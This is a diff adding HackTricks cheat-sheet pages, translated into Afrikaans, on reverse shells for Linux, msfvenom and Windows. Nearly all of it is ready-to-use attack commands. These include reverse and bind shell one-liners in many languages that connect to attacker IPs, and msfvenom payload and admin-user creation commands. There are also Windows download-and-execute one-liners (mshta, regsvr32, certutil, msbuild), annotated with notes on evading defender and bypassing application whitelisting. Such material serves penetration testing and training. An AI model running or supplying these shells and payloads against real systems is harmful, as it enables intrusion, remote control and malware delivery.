while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## NodeJS +```javascript +(function(){ +var net = require("net"), +cp = require("child_process"), +sh = cp.spawn("/bin/sh", []); +var client = new net.Socket(); +client.connect(8080, "10.17.26.64", function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +}); +return /a/; // Prevents the Node.js application form crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') +require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'") + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') + +or + +// If you get to the constructor of a function you can define and execute another function inside a string +"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() +"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() + + +or + +// Abuse this syntax to get a reverse shell +var fs = this.process.binding('fs'); +var fs = process.binding('fs'); + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` +## OpenSSL + +Die Aanvaller (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Die Slachtoffer +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## 
**Socat** + +[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) + +### Bind shell +```bash +victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane +attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +``` +### Terugskakel +```bash +attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 +victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane +``` +## Awk +```bash +awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` +## Vinger + +**Aanvaller** +```bash +while true; do nc -l 79; done +``` +Om die opdrag te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop) + +**Slachtoffer** +```bash +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done + +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done +``` +## Gawk +```bash +#!/usr/bin/gawk -f + +BEGIN { +Port = 8080 +Prompt = "bkd> " + +Service = "/inet/tcp/" Port "/0/0" +while (1) { +do { +printf Prompt |& Service +Service |& getline cmd +if (cmd) { +while ((cmd |& getline) > 0) +print $0 |& Service +close(cmd) +} +} while (cmd != "exit") +close(Service) +} +} +``` +## Xterm + +Dit sal probeer om met jou stelsel te verbind op poort 6001: +```bash +xterm -display 10.0.0.1:1 +``` +Om die omgekeerde skulp te vang kan jy gebruik (wat op poort 6001 sal luister): +```bash +# Authorize host +xhost +targetip +# Listen +Xnest :1 +``` +## Groovy + +deur [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) LET WEL: Java reverse shell werk ook vir Groovy +```bash +String host="localhost"; +int port=8044; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), 
si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` +## Verwysings + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) +* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) + +**Probeer Hard Sekuriteitsgroep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md new file mode 100644 index 000000000..0e03fc1fa --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -0,0 +1,242 @@ +# MSFVenom - CheatSheet + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +
+ +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en bug bounty jagters! + +**Hacking Inligting**\ +Betrek met inhoud wat die opwinding en uitdagings van hacking ondersoek + +**Regte-Tyd Hack Nuus**\ +Bly op hoogte van die vinnige hacking wêreld deur regte-tyd nuus en insigte + +**Laaste Aankondigings**\ +Bly ingelig oor die nuutste bug bounties wat bekendgestel word en belangrike platform opdaterings + +**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! + +*** + +## Basiese msfvenom + +`msfvenom -p -e -f -i LHOST=` + +Mens kan ook die `-a` gebruik om die argitektuur te spesifiseer of die `--platform` + +## Lyste +```bash +msfvenom -l payloads #Payloads +msfvenom -l encoders #Encoders +``` +## Algemene parameters wanneer 'n shellcode geskep word +```bash +-b "\x00\x0a\x0d" +-f c +-e x86/shikata_ga_nai -i 5 +EXITFUNC=thread +PrependSetuid=True #Use this to create a shellcode that will execute something with SUID +``` +## **Windows** + +### **Terug Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe +``` +### Skep Gebruiker + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe +``` +{% endcode %} + +### CMD Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe +``` +### **Voer Opdrag Uit** + +{% code overflow="wrap" %} +```bash +msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe +msfvenom -a x86 
--platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe +``` +### Encoder +```bash +msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe +``` +{% endcode %} + +### Ingebed binne uitvoerbare + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe +``` +{% endcode %} + +## Linux Payloads + +### Reverse Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf +msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf +``` +### SunOS (Solaris) + +{% code overflow="wrap" %} +```bash +msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf +``` +{% endcode %} + +## **MAC Payloads** + +### **Reverse Shell:** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho +``` +{% endcode %} + +### **Bind Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho +``` +{% endcode %} + +## **Web-gebaseerde Payloads** + +### **PHP** + +#### Terugskakel**l** + +{% code overflow="wrap" %} +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` +{% endcode %} + +### ASP/x + +#### Terug shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp +msfvenom -p 
windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx +``` +{% endcode %} + +### JSP + +#### Terugskakel + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp +``` +{% endcode %} + +### OORLOG + +#### Terug Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +``` +{% endcode %} + +### NodeJS +```bash +msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) +``` +## **Script Taal payloads** + +### **Perl** + +{% code overflow="wrap" %} +```bash +msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl +``` +### **Python** +```bash +msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py +``` +### **Bash** +```bash +msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh +``` +{% endcode %} + +
+ +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en bug bounty jagters te kommunikeer! + +**Hacking Inligting**\ +Betrek met inhoud wat die opwinding en uitdagings van hacking ondersoek + +**Regte Tyd Hack Nuus**\ +Bly op hoogte van die vinnige hacking wêreld deur regte tyd nuus en insigte + +**Laaste Aankondigings**\ +Bly ingelig oor die nuutste bug bounties wat bekendgestel word en belangrike platform opdaterings + +**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md new file mode 100644 index 000000000..9785efb62 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/windows.md @@ -0,0 +1,506 @@ +# Shells - Windows + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +## Lolbas + +Die bladsy [lolbas-project.github.io](https://lolbas-project.github.io/) is vir Windows soos [https://gtfobins.github.io/](https://gtfobins.github.io/) vir linux.\ +Dit is duidelik, **daar is geen SUID lêers of sudo regte in Windows nie**, maar dit is nuttig om te weet **hoe** sommige **binaries** (mis)bruik kan word om 'n soort onverwagte aksies uit te voer soos **arbitraire kode uit te voer.** + +## NC +```bash +nc.exe -e cmd.exe +``` +## NCAT +slagoffer +``` +ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" +#Encryption to bypass firewall +ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" +``` +aanvaller +``` +ncat -l +#Encryption to bypass firewall +ncat -l --ssl +``` +## SBD + +**[sbd](https://www.kali.org/tools/sbd/) is 'n draagbare en veilige Netcat alternatief**. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk versleuteling, programuitvoering, aanpasbare bronpoorte, en deurlopende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows gebruikers kan die sbd.exe weergawe van die Kali Linux verspreiding as 'n betroubare vervanging vir Netcat gebruik word. 
+```bash +# Victims machine +sbd -l -p 4444 -e bash -v -n +listening on port 4444 + + +# Atackers +sbd 10.10.10.10 4444 +id +uid=0(root) gid=0(root) groups=0(root) +``` +## Python +```bash +#Windows +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in 
[(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` +## Perl +```bash +perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +#Windows +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## Lua +```bash +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## OpenSSH + +Aanvaller (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Slachtoffer +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## Powershell +```bash +powershell -exec bypass -c "(New-Object 
Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" +powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" +Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile +``` +Proses wat netwerkoproep uitvoer: **powershell.exe**\ +Payload op skyf geskryf: **NEE** (_ten minste nêrens waar ek met procmon kon vind!_) +```bash +powershell -exec bypass -f \\webdavserver\folder\payload.ps1 +``` +Proses wat netwerkoproep uitvoer: **svchost.exe**\ +Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas** + +**Een-liner:** +```bash +$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` +**Kry meer inligting oor verskillende Powershell-shelle aan die einde van hierdie dokument** + +## Mshta + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) +``` + +```bash +mshta http://webserver/payload.hta +``` + +```bash +mshta \\webdavserver\folder\payload.hta +``` +#### **Voorbeeld van hta-psh omgekeerde skulp (gebruik hta om PS agterdeur af te laai en uit te voer)** +```xml + +``` +**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager hta** + +#### hta voorbeeld + +[**Van 
hier**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) +```xml + + + + + + + + + +``` +#### **mshta - sct** + +[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + + +``` +#### **Mshta - Metasploit** +```bash +use exploit/windows/misc/hta_server +msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > exploit +``` + +```bash +Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit +``` +**Gevind deur verdediger** + + + + +## **Rundll32** + +[**Dll hello world voorbeeld**](https://github.com/carterjones/hello-world-dll) + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +rundll32 \\webdavserver\folder\payload.dll,entrypoint +``` + +```bash +rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); +``` +**Gevind deur verdediger** + +**Rundll32 - sct** + +[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + +``` +#### **Rundll32 - Metasploit** +```bash +use windows/smb/smb_delivery +run +#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 +``` +**Rundll32 - Koadic** +```bash +use stager/js/rundll32_js +set SRVHOST 192.168.1.107 +set ENDPOINT sales +run +#Koadic will tell you what you need to execute inside the victim, it will be something like: +rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); +``` +## Regsvr32 + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) 
+```bash +regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll +``` + +``` +regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll +``` +**Gedig deur verdediger** + +#### Regsvr32 -sct + +[**Van hier**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) +```markup + + + + + + + + +``` +#### **Regsvr32 - Metasploit** +```bash +use multi/script/web_delivery +set target 3 +set payload windows/meterpreter/reverse/tcp +set lhost 10.2.0.5 +run +#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll +``` +**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager regsvr** + +## Certutil + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) + +Laai 'n B64dll af, dekodeer dit en voer dit uit. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll +``` +Laai 'n B64exe af, dekodeer dit en voer dit uit. 
+```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe +``` +**Gevind deur verdediger** + + +## **Cscript/Wscript** +```bash +powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" +``` +**Cscript - Metasploit** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs +``` +**Gevind deur verdediger** + +## PS-Bat +```bash +\\webdavserver\folder\batchfile.bat +``` +Proses wat netwerkoproep uitvoer: **svchost.exe**\ +Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat +impacket-smbserver -smb2support kali `pwd` +``` + +```bash +\\10.8.0.3\kali\shell.bat +``` +**Gevind deur verdediger** + +## **MSIExec** + +Aanvaller +``` +msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi +python -m SimpleHTTPServer 80 +``` +Slachtoffer: +``` +victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi +``` +**Gevind** + +## **Wmic** + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +wmic os get /format:"https://webserver/payload.xsl" +``` +Voorbeeld xsl-lêer [van hier](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): +```xml + + + + + + + +``` +**Nie gedetecteer nie** + +**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager wmic** + +## Msbuild + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +``` +cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! 
payload.xml" +``` +U kan hierdie tegniek gebruik om toepassingswitlys en Powershell.exe-beperkings te omseil. U sal met 'n PS-skal gevra word.\ +Laai net dit af en voer dit uit: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj +``` +**Nie gedetecteer nie** + +## **CSC** + +Compileer C# kode op die slagoffer masjien. +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs +``` +You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) + +**Nie gedetecteer nie** + +## **Regasm/Regsvc** + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll +``` +**Ek het dit nie probeer nie** + +[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) + +## Odbcconf + +* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} +``` +**Ek het dit nie probeer nie** + +[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) + +## Powershell Skale + +### PS-Nishang + +[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) + +In die **Skale** gids, is daar 'n klomp verskillende skale. 
